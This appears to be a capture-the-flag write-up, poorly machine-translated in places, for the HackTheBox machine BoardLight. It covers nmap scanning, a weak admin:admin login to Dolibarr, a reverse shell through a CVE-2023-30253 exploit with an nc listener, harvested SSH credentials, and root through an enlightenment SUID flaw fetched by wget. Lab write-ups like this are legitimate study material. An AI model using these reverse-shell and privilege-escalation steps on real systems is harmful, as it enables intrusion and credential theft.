BoardLight Target Notes
summarize
HTB's target machine BoardLight
Target machine address:/machines/BoardLight
I. nmap scanning
1) Port scanning
-sT tcp full connection scan --min-rate Scan at minimum rate of 10000 -p- Scan full port
sudo nmap -sT --min-rate 10000 -p- -o ports 10.10.11.11
Warning: 10.10.11.11 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.11
Host is up (0.23s latency).
Not shown: 41074 closed tcp ports (conn-refused), 24459 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Sat Aug 17 20:10:36 2024 -- 1 IP address (1 host up) scanned in 100.49 seconds
2) Detail Detection
-sT tcp full connection scan -sV detect port service version -sC scan using default script -O detect target operating system
sudo nmap -sT -sV -sC -O -p22,80 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.36s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 062d3b851059ff7366277f0eae03eaf4 (RSA)
| 256 5903dc52873a359934447433783135fb (ECDSA)
|_ 256 ab1338e43ee024b46938a9638238ddf4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Sat Aug 17 20:12:43 2024 -- 1 IP address (1 host up) scanned in 44.29 seconds
3) Vulnerable Script Scanning
sudo nmap --script=vuln -o vuln 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.46s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf: [0/105]
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.11
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.11.11:80/
| Form id:
| Form action:
|
| Path: http://10.10.11.11:80/
| Form id:
| Form action:
|
| Path: http://10.10.11.11:80/
| Form id:
| Form action:
|
| Path: http://10.10.11.11:80/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
# Nmap done at Sat Aug 17 20:16:04 2024 -- 1 IP address (1 host up) scanned in 156.22 seconds
II. Web Penetration
1) Domain Discovery
Discover domain names at the bottomput into (writing)/etc/hosts
Papers
sudo echo "10.10.11.11 " | sudo tee -a /etc/hosts
put him onsmall thingdomain name blastingcap (a poem)catalog bursting
Blasting virgin domains,htb
put into (writing)/etc/hosts
file
interviews
Saw a cms framework that tries weak passwordsadmin:admin
Log in.
III. Gaining a foothold
Search via google
Found it.Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
According to the utilization tutorial on the side of github
kali local
nc -lvvp 4444
Utilizing scripts
python3 admin admin 10.10.14.69 4444
Successful shell bounce
Find the configuration file
Found a set of credentials.
Look at the user
ls /home
larissa
ssh credentialslarissa:serverfun2$2023!!
Connect to ssh to get a normal user
ssh [email protected]
IV. Lifting power to root
find / -perm -4000 -type f 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
see thatenlightenment_sys
He's got a SUID extraction vulnerability.
CVE-2022–37706
We download kail, start a php service on port 80, download it with wget on the target machine, and execute it to root.
Get the root flag.
summarize
- Scanning through nmap reveals that the target machine has ports 22 and 80 open.
- Directory bursting and subdomain bursting was performed on the http service on port 80, and the doblarr cms framework was found, and the exploit script for the Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 vulnerability was found through a google search.
- The shell was successfully obtained by exploiting a vulnerability in the cms, and by reading the configuration, a set of credentials was found
larissa:serverfun2$2023!!
The user's shell has been successfully obtained. - The root shell was successfully obtained through the utilization of the SUID of the desktop management component, enlightenment.